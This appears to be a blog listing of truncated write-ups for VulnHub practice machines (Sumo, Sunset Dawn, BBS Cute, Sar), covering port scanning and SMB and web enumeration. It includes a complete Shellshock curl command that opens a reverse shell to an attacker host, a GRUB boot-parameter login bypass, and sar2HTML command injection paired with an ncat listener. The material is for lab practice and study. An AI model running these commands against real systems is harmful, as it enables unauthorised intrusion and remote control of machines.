hacking

https://www.vulnhub.com/entry/sumo-1,480/ System Info Ubuntu 12.04 LTS Discover Target Network sudo nmap -sn 192.168.122.0-255 nmap -p- 192.168.122.113 Port 80 not much to see on the website, other than it is running apache 2.2.22 ShellShock https://www.sevenlayers.com/index.php/125-exploiting-shellshock use nikto -host 192.168.122.113 to scan for webserver vulnerabilities. it shows that/cgi-bin/test, /cgi-bin/test.sh, /cgi-bin/test/test.cgi is vulnerable to Shellshock vulnerability running: curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi to open a revese shell on port 7741 to host using TCP...

https://www.vulnhub.com/entry/sunset-dawn,341/ System Info Debian 10 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.11 nmap -p 80,139,445,3306 -sC -sV 192.168.122.11 enum4linux -a 192.168.122.11 Port 80 robots.txt does not exist using dirb http://192.168.122.11 we can find http://192.168.122.11/logs/ we can download management.log from it and take a look SMB server Port 139 and port 445 indicate that there is a smb server on the target machine use smbclient -L //dawn to list all the service of it, and we can find shared disk ITDEPT we can log into it by smbclient //dawn/ITDEPT now we are in the smb share, but it is empty if we go back to reading that management....

https://www.vulnhub.com/entry/bbs-cute-102,567/ Fix VM network Debian 10, network is broken in QEMU launch VM, edit GRUB parameters of line linux ..., change ro to rw, and add init=/bin/bash after it to by pass login edit /etc/network/interfaces, change interface name to ours, add auto enp1s0 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.122 nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122 Port 80 This site doesn’t have a robots.txt run dirb http://192....

https://www.vulnhub.com/entry/sar-1,425/ Discover Targer Networks sudo nmap -sn 192.168.122.1-255 sudo nmap -p- 192.168.122.207 Port 80 run dirb http://192.168.122.207 and found http://192.168.122.207/phpinfo.php Visit http://192.168.122.207/robots.txt and foundhttp://192.168.122.207/sar2HTML/ sar2HTML Version 3.2.1 of sar2HTML is vulnerble to remote code execution using URL GET request https://www.exploit-db.com/exploits/47204 Reverse Shell we can add any command after http://192.168.122.207/sar2HTML/index.php?plot=; to run, we can try some options from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md Python we can check if python exist on the machine http://192.168.122.207/sar2HTML/index.php?plot=;which python3 then we can run ncat -nvlp 4444on the attacker’s machine, and go tohttp://192....